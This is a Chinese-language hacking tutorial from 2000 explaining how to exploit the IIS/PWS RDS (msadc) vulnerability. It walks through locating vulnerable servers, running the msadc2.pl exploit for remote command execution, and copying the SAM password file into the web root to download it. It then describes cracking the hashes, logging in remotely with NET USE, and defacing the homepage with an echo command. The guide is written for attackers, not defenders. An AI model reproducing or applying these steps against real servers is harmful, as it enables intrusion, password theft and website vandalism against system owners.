简单使用 IIS/PWS - RDS Exploit

/ns/ld/win/data/20010318063758.htm

简单使用 IIS/PWS - RDS Exploit

BY XUNDI

先查找一台运行了IIS或者PWS的服务器:
你可以使用下面的方法了搜寻:

1,到www.netcraft.com查找
2,通过www.altavista.com搜寻通用的IIS文件:
如: link:/showcode.asp 或者url:/msadc/ 或者 url:/iishelp

但你查询到服务器类型的时候,你可以在你的IE中使用下面的URL请求:

www.server.com/index.ida or www.server.com/.idq

大多数服务器就会告诉你WEB服务的默认物理地址,当然有很多中
方法可以获得WEB服务程序在系统上的物理地址,你可以到BUGTRAQ
查询。

现在你就在http://www.xfocus.org站点下载一个msadc2.pl或者msadc.pl程序,
当然如果你是在WIN系统上操作的话,你还需要到www.activestate.com站点中
下载ActivePerl解释器来使用,你如果有RD LINUX,FREEBSD系统当然不需要
装载PERL了,因为他们默认就存在了。

在WINDOWS下你可以使用command.com,在NT下你使用cmd.exe来执行,在LINUX
下你就可以直接执行下面的命令:

perl -x c:\msadc2.pl -h www.server.com

如果那个服务器确实存在这个RDS/IIS漏洞的话,就会在

cmd /c下面停止

然后你在停止处打入你所需要的命令,如:

copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\temp.fil

接着你在你的浏览器上打入如下的请求:

www.server.com/temp.fil

OK,你就这样获得了对方机器上的NT HASHED的密码,你的先extract这个
文件,在(cmd/command)你可以使用下面的命令:

extract temp.fil whatever.file

然后你就可以使用L0phtcrack(可以从www.l0pht.com/l0phtcrack下载)
或者其他类似的破密码工具来破解whatever.file.在你破解出whatever.file
的密码之后,你可以编辑你自己机器上的lmhosts.sam,并加上下面的名字:

www.server.com

注:lmhosts.sam在NT下是保存在\winnt\system32\drivers\etc 目录下的,在
WINDOWS 9X是在\windows\config\ 。

然后你就使用查找计算机的方法来搜寻:

www.server.com

等找到计算机后,你点击相应图标,再打入用户名和密码,你就进入了
那个机器。

当然你也可以使用NET USE命令来远程使用那个计算机,呵呵。

当然如果你光光要更改起主页,只要找到对应服务器上的默认页面,如:
index.htm, index.html, index.asp, default.htm, default.html default.asp,
等等。

然后再运行:

perl -x c:\msadc2.pl -h www.server.com

cmd/c: echo 这个站点已经被CASPER和QUACK黑掉了,哈哈........ >
c:\inetpub\wwwroot\default.htm


当然有很多其他方法,就看你想怎么做了。现在很多机器升级了以后
应该没有这个漏洞了,但既然是十大EXPLOIT之一,就随便写写罗。

xundi@21cn.com 2000-08-10
http://focus.sivlersand.net
http://www.xfocus.org
http://www.xfocus.net